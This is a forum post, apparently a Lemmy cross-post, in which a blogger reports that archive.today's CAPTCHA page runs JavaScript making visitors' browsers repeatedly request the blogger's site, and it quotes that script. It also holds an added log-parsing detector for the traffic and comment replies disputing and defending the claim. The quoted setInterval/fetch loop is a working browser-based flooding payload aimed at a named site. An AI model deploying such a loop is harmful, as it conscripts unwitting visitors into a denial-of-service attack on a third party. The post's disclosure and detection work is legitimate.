- cross-posted to:
- youshouldknow@lemmy.world
- datahoarder@lemmit.online
Around January 11, 2026, archive.today (aka archive.is, archive.md, etc.) started using its users as proxies to conduct a distributed denial of service (DDoS) attack against Gyrovague, my personal blog. All users encountering archive.today’s CAPTCHA page currently load and execute the following JavaScript:
setInterval(function() {
  fetch("https://gyrovague.com/?s" + Math.random().toString(36).substring(2, 3 + Math.random() * 8), {
    referrerPolicy: "no-referrer",
    mode: "no-cors"
  });
}, 300);
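A way to spot this traffic from the receiving server's side, as an added example that is not part of the original post: it flags clients whose requests have the shape the script produces (`GET /?s` plus 1 to 8 base36 characters, no Referer) rather than relying on the exact 300 ms interval. The combined access-log format, the thresholds, the function names and the sample lines are assumptions made for this example.

```javascript
// Added example: flag clients whose requests have the shape the script above
// produces: GET /?s<1-8 base36 chars> with no Referer header.
const PROBE = /^\/\?s[0-9a-z]{1,8}$/;
// Assumed combined log format: ip - - [time] "METHOD path proto" status bytes "referer" ...
const LINE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" \d{3} \S+ "([^"]*)"/;
const MONTHS = { Jan: "01", Feb: "02", Mar: "03", Apr: "04", May: "05", Jun: "06",
                 Jul: "07", Aug: "08", Sep: "09", Oct: "10", Nov: "11", Dec: "12" };

// "11/Jan/2026:10:00:00 +0000" -> epoch milliseconds (NaN if malformed)
function parseTime(s) {
  const m = /^(\d{2})\/(\w{3})\/(\d{4}):(\d{2}:\d{2}:\d{2}) ([+-]\d{2})(\d{2})$/.exec(s);
  if (!m || !MONTHS[m[2]]) return NaN;
  return Date.parse(`${m[3]}-${MONTHS[m[2]]}-${m[1]}T${m[4]}${m[5]}:${m[6]}`);
}

function findProbeClients(lines, { windowMs = 10000, minHits = 5 } = {}) {
  const byIp = new Map();
  for (const line of lines) {
    const m = LINE.exec(line);
    if (!m) continue;
    const [, ip, ts, method, path, referer] = m;
    // referrerPolicy "no-referrer" means the header is absent, logged as "-"
    if (method !== "GET" || !PROBE.test(path) || referer !== "-") continue;
    const t = parseTime(ts);
    if (Number.isNaN(t)) continue;
    if (!byIp.has(ip)) byIp.set(ip, []);
    byIp.get(ip).push({ t, token: path.slice(3) });
  }
  const flagged = [];
  for (const [ip, hits] of byIp) {
    hits.sort((a, b) => a.t - b.t);
    let peak = 0;
    for (let lo = 0, hi = 0; hi < hits.length; hi++) { // sliding time window
      while (hits[hi].t - hits[lo].t > windowMs) lo++;
      peak = Math.max(peak, hi - lo + 1);
    }
    const distinctTokens = new Set(hits.map((h) => h.token)).size;
    if (peak >= minHits) flagged.push({ ip, peakHits: peak, distinctTokens });
  }
  return flagged;
}

// Constructed sample log lines (documentation IP ranges), not real traffic.
const mk = (ip, sec, path, ref = "-") =>
  `${ip} - - [11/Jan/2026:10:00:0${sec} +0000] "GET ${path} HTTP/1.1" 200 512 "${ref}" "UA"`;
const SAMPLE = [
  ...["k3", "9xq2a", "f", "0zt81mc4", "ab12", "q7"].map((t, i) => mk("192.0.2.10", Math.floor(i / 3), "/?s" + t)),
  mk("198.51.100.7", 2, "/?s=archive", "https://gyrovague.com/"),
  mk("203.0.113.5", 3, "/?sm2"), mk("203.0.113.5", 4, "/?sz9p"),
];
console.log(findProbeClients(SAMPLE));
```

Because every token is random, a high `distinctTokens` count alongside `peakHits` separates this pattern from a client simply retrying one URL.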
The claim that archive.today is orchestrating a DDoS via CAPTCHA execution contradicts its known architecture, which relies on user agents to fetch content rather than actively injecting malicious payloads into client-side scripts. If the CAPTCHA page is indeed executing arbitrary JavaScript, this suggests a severe supply chain compromise or a misunderstanding of how the service’s proxy network functions. Can you provide the specific user-agent headers or network traces showing the origin of the traffic to distinguish between a botnet hijack and a false positive?
I’ve provided the script at the time this article was posted. You can see that the script is still there but with an updated interval.
relies on user agents to fetch content
huh?



